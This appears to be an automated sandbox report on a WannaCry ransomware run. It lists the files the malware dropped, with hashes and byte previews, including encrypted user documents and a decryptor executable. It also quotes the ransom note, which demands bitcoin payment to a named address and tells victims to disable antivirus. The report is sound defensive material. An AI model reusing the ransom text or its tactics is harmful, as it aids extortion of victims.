SHA-256:	A72C7501E987CE67813C58B44D86C14CCCBEDCF2F194D016BE5629B31DC5E810
SHA-512:	DD5737EA20E5158AD1CE1D53635EEC43536DF8AF6FB836A2C28D7AEE7CD51ED7E92C53A4C2E20CED94FF70F231453D67E8EDD5AF0CA953FE153138353CDDD311
Malicious:	true
Reputation:	unknown
Preview:	.6..3.w....D.\|...U\.m...s...i..<G.P.a(..D..E.........b.p..?..j.Ed......U~...$G..H~..l.7\|.$.0..2...p...g..N0...Cgm..W..,`!..+.`=.!.X.~.....` .r....ey..yo,v.........J...T..../y.^s...\....\..4..:..k....!%u.d..,W:.....>.r.z.\|Cuv.....j..oT.M.....%:..X...y......l...uV.BV.aO.k..A.h....dPh.6..).Y.6I..[.d...".V.....s\|>.u...f..(%+..wB:......s.....p.0WM....\|....q....m...........w>!hbs....$......Az.h.flk...g..g....J.c.....\|..m"...e.ijX.D.8kn........:.=...$vzbT.....W.#7..Z.R..8.#`C..R(.....~].X.....@..Z@..!.m".$....Z.2{m...b..>#.\|j.^...l.5K.....]...u....&q.Q~.. .7.5,..M.(....D.~../$~.V...R..l..-OR./"..........k.@-..M0..\|.%.;g...i..C....c8W."..E.T..\A...g....l..s..(...mj.1e.... r...B'.....5..&..Z.x.St.B...N.;...x.w....wOG."+#...%U...B..."z$..../..A_.j...........T...&..HypPH.a).........Tp.KTD....x..X/.Y...$%.$..P.T.r...bg...... k...m..\|#T...qd.h.&..L.\|..q;.Pr.x.q.B.`2.I...v.......$u....G...U.Bfy.*..1R0I.....s~..aa...7.R..M_...)x...%.[w.].".......

C:\Users\user\Documents\TQDFJHPUIU.jpg.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.8332581264916605
Encrypted:	false
SSDEEP:	24:bkN0ah2YolEbLeZxpbKwwTPg9MBgrm/Hfr7IbgVL76j01kBLfoNAe:bkNnh2zuehKww8Wga77IbgZ2jDMNAe
MD5:	734E31AD2CFA978C4AEBF0E51E21A2FC
SHA1:	BB1B940494526B610E7907257162BC47EB509502
SHA-256:	CA2E18E0BE46C6D5430741E9C9F3B9E9835B2C946E02C19851C21B91A70ACB69
SHA-512:	755C7D2E3DEE68485E7A4DD81A81B0C551E3FA3BCCB7EAA1FAF3A717275ED825B084C40975BDD2C4E68E94000B18F70101F7D718DFD2294B98145091F2ADB0D5
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....GI..._.`....`....S{J7.3P8LG..........fo.I.../...$.....C........o.... N.m...x&f....%...........Q?N..F.@..8...8.'O. .U...j.yC.e......{.W\|.....b.5....@...VCd./.._<....Y.-..9s7.O....D.w..9QX...r.....%.9.z.;g.7..4.\|ss}...f.s...{n.U$>........!9.^..p..............!..].....^x......d.p....\.U...`.-.L..g<.#Q...O{.4.Q........h.._.n.HZB...{.Cr..v..B..N...{m.scjW..e..............;.\.#..wn..(xg.c..T._....._.Mp.6.k.!Se.h.t...E..F5-.mma..N.qM4......@.n.[ ...C@...[..3Q.J...d..:.....Z..NA......9JTO.O....Xw>F.......\..o.6.3...\|J.a....h.\|..>L.@...."....... .oe..D%.`..L......1.....8....s3'0.`..6...0.+..=...I..E..I..~...=OU....h....M.Glt...P..r.Vg.....w.....J..O.r(.S.sT..}.n.#...`.t......G.p...Bt....G............W...w.=.u#....sZ.=..x....?_}..>...&=..-"g%..#:..\xV3.2.V.\..Q.3....r..d...#...'L0}.7S....2...A3.Z=....{...Yn.J.....[..q..I..\.Bj. .......\|..".....v..\.\D..M..r~...S.O.P+...=..^m.~..x4._."K..b.O.I.=L..5.-.r..1.q@;N..u......"Th./.".[

C:\Users\user\Documents\TQDFJHPUIU.jpg.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.8332581264916605
Encrypted:	false
SSDEEP:	24:bkN0ah2YolEbLeZxpbKwwTPg9MBgrm/Hfr7IbgVL76j01kBLfoNAe:bkNnh2zuehKww8Wga77IbgZ2jDMNAe
MD5:	734E31AD2CFA978C4AEBF0E51E21A2FC
SHA1:	BB1B940494526B610E7907257162BC47EB509502
SHA-256:	CA2E18E0BE46C6D5430741E9C9F3B9E9835B2C946E02C19851C21B91A70ACB69
SHA-512:	755C7D2E3DEE68485E7A4DD81A81B0C551E3FA3BCCB7EAA1FAF3A717275ED825B084C40975BDD2C4E68E94000B18F70101F7D718DFD2294B98145091F2ADB0D5
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....GI..._.`....`....S{J7.3P8LG..........fo.I.../...$.....C........o.... N.m...x&f....%...........Q?N..F.@..8...8.'O. .U...j.yC.e......{.W\|.....b.5....@...VCd./.._<....Y.-..9s7.O....D.w..9QX...r.....%.9.z.;g.7..4.\|ss}...f.s...{n.U$>........!9.^..p..............!..].....^x......d.p....\.U...`.-.L..g<.#Q...O{.4.Q........h.._.n.HZB...{.Cr..v..B..N...{m.scjW..e..............;.\.#..wn..(xg.c..T._....._.Mp.6.k.!Se.h.t...E..F5-.mma..N.qM4......@.n.[ ...C@...[..3Q.J...d..:.....Z..NA......9JTO.O....Xw>F.......\..o.6.3...\|J.a....h.\|..>L.@...."....... .oe..D%.`..L......1.....8....s3'0.`..6...0.+..=...I..E..I..~...=OU....h....M.Glt...P..r.Vg.....w.....J..O.r(.S.sT..}.n.#...`.t......G.p...Bt....G............W...w.=.u#....sZ.=..x....?_}..>...&=..-"g%..#:..\xV3.2.V.\..Q.3....r..d...#...'L0}.7S....2...A3.Z=....{...Yn.J.....[..q..I..\.Bj. .......\|..".....v..\.\D..M..r~...S.O.P+...=..^m.~..x4._."K..b.O.I.=L..5.-.r..1.q@;N..u......"Th./.".[

C:\Users\user\Documents\TQDFJHPUIU.xlsx

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.804259779094444
Encrypted:	false
SSDEEP:	24:q2Scm9r9kL4pbcLLqAzryXJO7xGqX+f6AA6ZTXpX:qmm9JUfLqAzOwMqOyeFpX
MD5:	5DF2F48E6F3C5E8F70CD0DACE80DA750
SHA1:	E04A4D00726CE080C744FCBDE1CE00A6301596FD
SHA-256:	B18DCB73623AE3B4525ED8224E0A4930BBA3603899A8715828B09B00BD2DBA92
SHA-512:	A878A5EA766E44DD4F3F8FECA459C3E636D0DD39A0ADB83933857CC5DCDDFB361AC3C382A182BA1ED7872C0C22CD1D500BD0D3F2158CB7D49AF911ADBD407E22
Malicious:	false
Reputation:	unknown
Preview:	6."\|.2..o..nk.8.o.t.{\|O.....a#.1.y...8..,..../E.....j.S!i. 6z$.PTn...'T...\|SQ..'......1i..-....w.Umo3..w.......C.;..._...,....St.r%.N.?.V..Ao..0Ch......e.bM,.lx.77..Jz....m...@.,.u.-?.c<.2..)V/..-.Q..........[.(Q.x......g.3F.H....$....UvN...iwY..=7..J..!...r.......:.?.{X[yD.Ew...5.......$l_...>...l4d..>.4\.p.{V[y}..:WPC..1....[.....m./U77......dI..c.p..i.Hi3.?]u. ..M.......B...&.lQ.,..5.a......P......9=9Y.......@..y..T.....rf..T.0O.p.`...4.n..JGo.w.....0].....y..#..[.-.Y....c"W}....U.{B..r.\|...M2$.p.Lk.#...?.....qAg..'.dd(:C\Y..c.r.......S...2......5..w.....S...:.... ?..bY..cg.,....\|7.qR~.._.........w.}.Y...........9...\a.........._.....x.o.=_B.r.?.f..X.>m..5..t/p....i..`....=.....:A....2e.....}.[U._..HPZ..3..=.....x..Y.. ..n.j.yXj..g..O.L.....U\5x>..DnVAu\..T2..7~.DA.;..i.<.1.PU.+t.....=.4..@.L#..D...2Q=......W.).J..'[.~....5.T..z...Iz...a.x.,C]`.$x..A.).0V.....L.$.{.^.^90.u:.[.n....dVc..a...4...U.A.....$r.L....6..r.mX.(px....

C:\Users\user\Documents\TQDFJHPUIU.xlsx.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.830448327383122
Encrypted:	false
SSDEEP:	24:bk4xwDlSU9cTtiJ73jwFyyiXhnzEV32dg7wAfg3pPiNAAb8QdYFWYe:bknRBcTtU3jwwyiRMwAfg30AAb8QdOPe
MD5:	BABC5504E9BA395C7D2842970197374F
SHA1:	E54580BB60FBFBD5E377A049B93D0819BCF5C8E8
SHA-256:	841AD525F3624C51B71BC17615EBD9D84EB662952EF633E0E3E50C9662E775DC
SHA-512:	A28094334CA89EE04F3F88C0BB19D349FEE5B126DA95EC6BD98FE709D4B157F2802C96C67EC0BA91B60DDB758E0C42DEF52CD3D30D82F28496E3A39DB3EF69DC
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!...........a2....;..._..V.-..\.o.oq..o}...#/.g2...JF...:.y......>....p.%>.i.r..s.v."5.. .c.E..WtbG....,7w.#...W.._.8j..I.4u,.C...}..p...J........X3e..\|...t...]...x.....[..hV.....S.8..f..#.t..c..5Q."~..0D.8ls.u6A..$.^.3..'Y2O..7.A.z\...:.. .M.k.................t..`!..e...I:..C..K)....kM..\|....r....F.Fz.2.B.F.-0. .ZR^......j-.mw h.HMQ.G.\p\...X.....I.Oq:Z..D..G2m.b#(..R..^Bd.L...{.Y.6..y?.D.D.].h.S>k.O...... ....[....k8N..J...h.}`XE..y#8O...S...4.......\|...5...L...........(v/F.[.........6...\|5.BS{..........oM..W...\.`K.Z.4d"../..^O..9.>,<...).0.#S.y=d.<.t5..x..-;..2.I.WTS3zC.=...w.....[.2....^...n+.P.A.......m.2..`...w)h._..u..W...G...?U .J.tlS.h..5......V^..t...A....h..T...~M..._"l;...wh.sY..`.v.qfw.].L6=..Cd...OW...A...)...l...lO=O[.8.P'vYB.z..r{......9...J.S..)".Y..#.....z.$.Bb..}I\|..I....p..Upv...S..E.I.sz/L..#..oP.m.0..#.........4z.J.M2D...f.x.d...E..-...('D....2[...8Rayf.E...'s.......2..k...^.T?../..a3Qn.%...R..D.}..A.%P.}.t8(.

C:\Users\user\Documents\TQDFJHPUIU.xlsx.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.830448327383122
Encrypted:	false
SSDEEP:	24:bk4xwDlSU9cTtiJ73jwFyyiXhnzEV32dg7wAfg3pPiNAAb8QdYFWYe:bknRBcTtU3jwwyiRMwAfg30AAb8QdOPe
MD5:	BABC5504E9BA395C7D2842970197374F
SHA1:	E54580BB60FBFBD5E377A049B93D0819BCF5C8E8
SHA-256:	841AD525F3624C51B71BC17615EBD9D84EB662952EF633E0E3E50C9662E775DC
SHA-512:	A28094334CA89EE04F3F88C0BB19D349FEE5B126DA95EC6BD98FE709D4B157F2802C96C67EC0BA91B60DDB758E0C42DEF52CD3D30D82F28496E3A39DB3EF69DC
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!...........a2....;..._..V.-..\.o.oq..o}...#/.g2...JF...:.y......>....p.%>.i.r..s.v."5.. .c.E..WtbG....,7w.#...W.._.8j..I.4u,.C...}..p...J........X3e..\|...t...]...x.....[..hV.....S.8..f..#.t..c..5Q."~..0D.8ls.u6A..$.^.3..'Y2O..7.A.z\...:.. .M.k.................t..`!..e...I:..C..K)....kM..\|....r....F.Fz.2.B.F.-0. .ZR^......j-.mw h.HMQ.G.\p\...X.....I.Oq:Z..D..G2m.b#(..R..^Bd.L...{.Y.6..y?.D.D.].h.S>k.O...... ....[....k8N..J...h.}`XE..y#8O...S...4.......\|...5...L...........(v/F.[.........6...\|5.BS{..........oM..W...\.`K.Z.4d"../..^O..9.>,<...).0.#S.y=d.<.t5..x..-;..2.I.WTS3zC.=...w.....[.2....^...n+.P.A.......m.2..`...w)h._..u..W...G...?U .J.tlS.h..5......V^..t...A....h..T...~M..._"l;...wh.sY..`.v.qfw.].L6=..Cd...OW...A...)...l...lO=O[.8.P'vYB.z..r{......9...J.S..)".Y..#.....z.$.Bb..}I\|..I....p..Upv...S..E.I.sz/L..#..oP.m.0..#.........4z.J.M2D...f.x.d...E..-...('D....2[...8Rayf.E...'s.......2..k...^.T?../..a3Qn.%...R..D.}..A.%P.}.t8(.

C:\Users\user\Documents\UNKRLCVOHV.mp3

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.812751164747406
Encrypted:	false
SSDEEP:	24:HS7ENSlYBaK/bjvJFv2VwpyVC8b82IYgwuhm5/ZI:yINSlspjjvkw38kYg3Y/ZI
MD5:	29D8CE8BECAD79E3C47D57257142B901
SHA1:	2939B35E82AC27746F8B06BF12D09C584B0B5457
SHA-256:	CA1A804D5903DC06D10A1EA263771AA41DDAA5DC60EDC064E0300817B0FFF643
SHA-512:	02771577D4E510DBD60A607F62F1890909F08BEE49B638A4399EBC94128FE1CB17BA5B2AD334CA4B8CD0C510DB6093DD9AAEAAFB4EAC9A6586577A2280330747
Malicious:	false
Reputation:	unknown
Preview:	u.....v...=w3"..!5.>......W...V7....R.C..P<H.......}M>.X#.tr..n...=8.,~.]R..;.`..[>a...1.[..Dw7..<FP.^..(..~......$z.....(.l..C.Z..!.\..@..........1;......ra.....q...x.+.[P...K..q.D...Z[1...w$.h...b..(.k:Eu...h'.p5.I.....,&.IE.K.{...,.....h....#..8Z....E.$<........f.....C)..Y..Vh...b.cfH..{.s..$s....Lx0...x..7U.M.xUst..Dr.?\|J.....P.#. .1..@....@,.....T.O"T.Gg..e@..z...7.w.,....g..... &...D....Z~...n.........K....Jw"...V.V.vc.m>l...<._..k.......e..F2..hq.qk`+. Q....y.s.OU.....8(.)m2:....nGP._E.5.B.2.........dl....6....y5w...I...l...=p.l.-L.ih......Cf"...43K.1.r....a9..../.Y-.u..Vn.\).....4.$c../:...N...r...f..P...sW~.x.W.P(....v..B.v.J\...bi.Q...R...7-..2~a56.m.O......P..b.8.8.C.~L......C......{.......xp.....Zd.,.Tj.@..xb..C..C<P....9.W..\|}T&k....>x.bfp .u.p.ly..0..h.....nL%U-c....@,....Yg.r.'..]#..(i!...'....h.p..f\g.&.-.......z.v&..S.n....1..U...S.B....V..w...............j..X...%rd}.W.zm.Q.-....._'#R..n...,.e.....6...%.xM..5/..b...Z.N.*N.

C:\Users\user\Documents\UNKRLCVOHV.mp3.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.845233428330521
Encrypted:	false
SSDEEP:	24:bkB0Nd/BkN6evfmEnzTD7E7c4w0ml2BEw1yyj9AZ4X4Y5ouo6NELrsN1D:bk+hBkN6eHmozTD7EBaUB4yy6h7NE2D
MD5:	B11796EF593C3FD071A10C9FC1B1C748
SHA1:	76E94A76F5A71D25D4CED0850A26E771DF113AAB
SHA-256:	50CC9335D80516CD464567160B1AE743A3F914326B410A7E1099BAC74122A5D9
SHA-512:	08D53E013BC26782CFDDCD6A13BAAE1310019AF03A687FCF27B47F1E74E7E141490FD27BA876E5C349231EBFD7F719A693A2D7133E5F24536A089A44EE1187FA
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!..........h..G.8..@..i\|..[t.gt..O.RArD...{.....^....@RP...9.(.{p}.D.%.........vi.b?..,.].T..}...s...ez]...=..A...}xV.C..~=...I........,W...]K..&..{......I..GE.D. .A`.....b/az4..)..V......J.~.....0k -ri=..K...y>\......n..'b..."+J.x...G...d.Y.............<..7.,.......`R..%...l...<.U........Y..1.\..+"9.V="n....hZ\...!-...~WF..&(..\|.2.... ......K..q..?i...Y..F.....-.:.AW...VaG..-...IV..x.)a..f.>...R.L.^kD..K....l.[..p(A....<.b.i..}...;u.B..5w.M&.....B.G...rv\|..~Qg...z..0.}.?..Qy'.!%^..y.....k+...........k..V.L.B.....h....rG2t.....7.PO..A....r~..qxQ.....Z.S.I.K#....0,.U.TC.&+..E..X.$8..z..kW...wv4..'....j.#.....G.L.4v.0......IO.$...W.4.;b.u.......0......[.....x-..s.u.].\|J...C....^'zT.RN...\|....S.9.&(.5.d.a1n.x.N..$.{I..j.P.pi./....k./oT.n....7..k.n.c.K>.O.8....C.(..V!.,M?......W9.T..'ef..P.[9..:...ZDq)..Cqu..W..w6...0...)..o...0l....C..*.6..2r.s.^.K.~....a.b..S.l......N..C..J[3......H/-.r..F.B.B:.......U_.v...p.@.U.nX...w...}...

C:\Users\user\Documents\UNKRLCVOHV.mp3.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.845233428330521
Encrypted:	false
SSDEEP:	24:bkB0Nd/BkN6evfmEnzTD7E7c4w0ml2BEw1yyj9AZ4X4Y5ouo6NELrsN1D:bk+hBkN6eHmozTD7EBaUB4yy6h7NE2D
MD5:	B11796EF593C3FD071A10C9FC1B1C748
SHA1:	76E94A76F5A71D25D4CED0850A26E771DF113AAB
SHA-256:	50CC9335D80516CD464567160B1AE743A3F914326B410A7E1099BAC74122A5D9
SHA-512:	08D53E013BC26782CFDDCD6A13BAAE1310019AF03A687FCF27B47F1E74E7E141490FD27BA876E5C349231EBFD7F719A693A2D7133E5F24536A089A44EE1187FA
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!..........h..G.8..@..i\|..[t.gt..O.RArD...{.....^....@RP...9.(.{p}.D.%.........vi.b?..,.].T..}...s...ez]...=..A...}xV.C..~=...I........,W...]K..&..{......I..GE.D. .A`.....b/az4..)..V......J.~.....0k -ri=..K...y>\......n..'b..."+J.x...G...d.Y.............<..7.,.......`R..%...l...<.U........Y..1.\..+"9.V="n....hZ\...!-...~WF..&(..\|.2.... ......K..q..?i...Y..F.....-.:.AW...VaG..-...IV..x.)a..f.>...R.L.^kD..K....l.[..p(A....<.b.i..}...;u.B..5w.M&.....B.G...rv\|..~Qg...z..0.}.?..Qy'.!%^..y.....k+...........k..V.L.B.....h....rG2t.....7.PO..A....r~..qxQ.....Z.S.I.K#....0,.U.TC.&+..E..X.$8..z..kW...wv4..'....j.#.....G.L.4v.0......IO.$...W.4.;b.u.......0......[.....x-..s.u.].\|J...C....^'zT.RN...\|....S.9.&(.5.d.a1n.x.N..$.{I..j.P.pi./....k./oT.n....7..k.n.c.K>.O.8....C.(..V!.,M?......W9.T..'ef..P.[9..:...ZDq)..Cqu..W..w6...0...)..o...0l....C..*.6..2r.s.^.K.~....a.b..S.l......N..C..J[3......H/-.r..F.B.B:.......U_.v...p.@.U.nX...w...}...

C:\Users\user\Documents\ZIPXYXWIOY.jpg

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.803894862328294
Encrypted:	false
SSDEEP:	24:C1dmMfFjpLLl7WnA2WxS0FIMz3heM7muofmq:CeMfFjxp7W/WxS0FPeTP
MD5:	7B034E6020CB5CF4A793C60CF971FE19
SHA1:	FD7B980A7EDE1CB70D9979EC7CD48A43EA5B5472
SHA-256:	13B76CC1BB8811E08C5DD778EC08CC07E9E69C7260D1D0A0F4B50C7882AD8341
SHA-512:	75E10297E22126CEA4F58CCDE611F7D82A2C0759CB5307D84118A18A61B9967118EE628D70B2A0B811E69F179281939F77F98668E06FF8D309488CEB29A43C55
Malicious:	false
Reputation:	unknown
Preview:	t.,S....F)(.ru.b...F.y.....=..z:..t.._....x....o.....#.r.7l....O...J......(.OQ......}z..h.s..Q...BGg3;..ftg5..y")jhbTtP.;$......1>.=.p.#./.G..m..f..D........jT...15....../.)...d...j.i.. O....)...{....+....Ww.b....<\4....\..C!..2..u.6.....m.. .M+..dx....z^..4....f....r...".`w.%.....NbD...r+..lJ.........oK..y..y.:z..(......f..A......t+T\...7.........7..yM!g.\|........H..b$.uPCT.J...@\..Ob.K;_...pL.J7O........]Z\x..i.$".1..)..N.1$\|....j...b...P...x..J,...c5.;.Xg...iV..^..W(vA_...)(E.....Z.......{;.Ml...d.aT...Pa.....D......i.B..M..R.V...o.....dY............A\..t......U.-.....[. ...7R\..O\q.P..e.s.......>i..a.8zm..zZy.h.8...`.YS..+P.........r..?..\|....L...3....R.......{A..p(.$.Z$d.^.P.k. ...0..+.....5..8../cD.c>b)S.<..~.c......G..n......Zf......9.'.`S.?..n.w..w...^W...9.0o.zl.m3.y.,....5..ky...d.9..e.....6Df....F...N..../..f.... &..B."...Pu.t..o.j.o.T?.2U.../@D..k.i,......_.n\!W.Py....9k.Pm..s.9..`..Ta..... .b.q(..#i~..r..Z.Db.j

C:\Users\user\Documents\ZIPXYXWIOY.jpg.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.855123727764501
Encrypted:	false
SSDEEP:	24:bkVuQXonakUsRD2UVXPl8sOqTh4wYcG4maynL1fF5hP/RbGc:bkkbU9gAwYczbynL1fFbhbGc
MD5:	816105AD2A6D00216723F2509CB300FC
SHA1:	B89A857ADB420B1005441604D8E62D513E591F1C
SHA-256:	22932E277ED7E67470259A63E667AC5CC52C3A420A203E39E389E259E017E6E2
SHA-512:	2FB85BF330C28F1A95147E18CDB7E01CA3E1EE2FBFB23BFD0FABA5E60FF25F7219ED22F5C792397802C12A582522142EF16E46DC3494F4743D5F18D20BEB4160
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!........q.wST....m.3../@Y.R$.x...o.....<..NQ..-V\.....?c.q......H[a..E....T...7.t.r...`.uU.......[.Zo.-`...n......~.v:b.XE\.g...F4...........jDU./%..i......a.........u..6X..,.+.x..D......sT.\|...........x-.-h....w.....M.R..#.(].q....qP..x%[.vj[j..2...............^..t..e}..........N...8....GZ.h\r..M...?p..V..!..[/k....)?.^.a.b_.l.x_,..p$ +.Q.....s../..H.l=l..$+..............L...Dbt...........\|..8O......x.5...... ....g#......=............1.,...s..#.Q....._#.....w..xI R..%y%.u2n..%na)].0..C....3.....3S.a...$..@...z..........9....}..@.9:#..V.O..n.vo4......!..#.;H....Z..+..e....9'.....@..l..{sl.....wyZ.'A.;......{@..T............n..f..o.J.f..D.`X...bVON..%.._......R94........w..N......!..[`.-..D..<h........_ED ...:.U'6.G>e.d37(.Bc.h.HHl..&.\.9}..;p....W4.l;.o...3../...Y.9..f...N..O.1N..O..8mw.\N.`.....M<.X.y...D.....w;J*:..-.x.....u............Tgj.\P..P_.D...e.0.....#..d.y..>.3...u.O....U.....U....h.\|.........5.....;...{..btL5{....8?!.8

C:\Users\user\Documents\ZIPXYXWIOY.jpg.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.855123727764501
Encrypted:	false
SSDEEP:	24:bkVuQXonakUsRD2UVXPl8sOqTh4wYcG4maynL1fF5hP/RbGc:bkkbU9gAwYczbynL1fFbhbGc
MD5:	816105AD2A6D00216723F2509CB300FC
SHA1:	B89A857ADB420B1005441604D8E62D513E591F1C
SHA-256:	22932E277ED7E67470259A63E667AC5CC52C3A420A203E39E389E259E017E6E2
SHA-512:	2FB85BF330C28F1A95147E18CDB7E01CA3E1EE2FBFB23BFD0FABA5E60FF25F7219ED22F5C792397802C12A582522142EF16E46DC3494F4743D5F18D20BEB4160
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!........q.wST....m.3../@Y.R$.x...o.....<..NQ..-V\.....?c.q......H[a..E....T...7.t.r...`.uU.......[.Zo.-`...n......~.v:b.XE\.g...F4...........jDU./%..i......a.........u..6X..,.+.x..D......sT.\|...........x-.-h....w.....M.R..#.(].q....qP..x%[.vj[j..2...............^..t..e}..........N...8....GZ.h\r..M...?p..V..!..[/k....)?.^.a.b_.l.x_,..p$ +.Q.....s../..H.l=l..$+..............L...Dbt...........\|..8O......x.5...... ....g#......=............1.,...s..#.Q....._#.....w..xI R..%y%.u2n..%na)].0..C....3.....3S.a...$..@...z..........9....}..@.9:#..V.O..n.vo4......!..#.;H....Z..+..e....9'.....@..l..{sl.....wyZ.'A.;......{@..T............n..f..o.J.f..D.`X...bVON..%.._......R94........w..N......!..[`.-..D..<h........_ED ...:.U'6.G>e.d37(.Bc.h.HHl..&.\.9}..;p....W4.l;.o...3../...Y.9..f...N..O.1N..O..8mw.\N.`.....M<.X.y...D.....w;J*:..-.x.....u............Tgj.\P..P_.D...e.0.....#..d.y..>.3...u.O....U.....U....h.\|.........5.....;...{..btL5{....8?!.8

C:\Users\user\Downloads\@Please_Read_Me@.txt

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	933
Entropy (8bit):	4.711824502619554
Encrypted:	false
SSDEEP:	24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
MD5:	7A2726BB6E6A79FB1D092B7F2B688AF0
SHA1:	B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
SHA-256:	840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
SHA-512:	4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
Malicious:	false
Reputation:	unknown
Preview:	Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

C:\Users\user\Downloads\@WanaDecryptor@.exe

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	245760
Entropy (8bit):	6.278920408390635
Encrypted:	false
SSDEEP:	3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
MD5:	7BF2B57F2A205768755C07F238FB32CC
SHA1:	45356A9DD616ED7161A3B9192E2F318D0AB5AD10
SHA-256:	B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
SHA-512:	91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 96%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..\|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...\|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Downloads\CZQKSDDMWR.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.851755635682305
Encrypted:	false
SSDEEP:	24:bkEu+BYkG6xqsdnjdWnZwTx/bYGpXHXZBwnhmbdh5gC57/jZ9uQnx:bkEuOxTWwTxzjXHXm05gw7b+k
MD5:	DBEB8817FE8A9CD0306E87BC0F64833F
SHA1:	9D4CD59300DD117D5406EB7D870DE926173CC89F
SHA-256:	49DD44A6955B16496076E8237332EF81CEA9ADA146239DB25C2E1E84F0829FF4
SHA-512:	0696EA650DCDBB09FBB359685E2C4ACDFC5C8673EC4696CA52EE9856A1CABE44BC6FB06BF84874FD34B5341D95A8BD4F41C88CB265C5DFAD5B2832C21CEA6882
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!..........B.T_X.....Q.#..3...Z.9....(...AY'7/H._/....r.a..%b~f..(....j.>..Ux......#8.A..N\.d.;(.c..^:....5.S. .VI..?.r@.V.....%;.cV..6..2B......h.d..FC(dAet#..'.....(.&..O.y.xd.?.g./.....!...9M..x..-..E?.....E...lq.`).2.....J.v.9.).../...3..../.s..............Yz>...@...k..?...]..a...N...Z.S...f@e.!...B}.;ra<._.e;.....Px..{x;....\|A.i.4~.;l.c.r,.P.a..}.x......C.].?........p....yD@.~).....tO...;$m..<.7....A.8...`\Cg..b.c.......".\|{...m3H..?6..\|...FK.]2..0.l/6...3.x.....u3..oE%...X...............@i....'.M.G...U.c....L.Y....)(l.?...\)).&.].9..].k*@...J.6..A.....Qi.".0.....)h..:.~...n..}....j..b......\|.....7D...)q.GX.M.\b.O.....S..U..8....!....s.p..Cm....@..K......px].5.h.xr...X..aNct.$.6..yzn1F"."...>e7u.....x.50.H2.-.IQ.3/.-Y..9.w.E..p.l.^.:O.).j.i...(.....B..3..........R.[.a.?..Ni.$...%...DE0..{o.z...o.#^M./oF..o..c.z,8.~.E.\|..N._...G$..1os......t.8.....\o6........+..T".vy..[4.9.!.xy...x4.$.=]i{.~"....e...kU..+..{b...f..[~N.~.....f

C:\Users\user\Downloads\EWZCVGNOWT.docx.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.833630189351209
Encrypted:	false
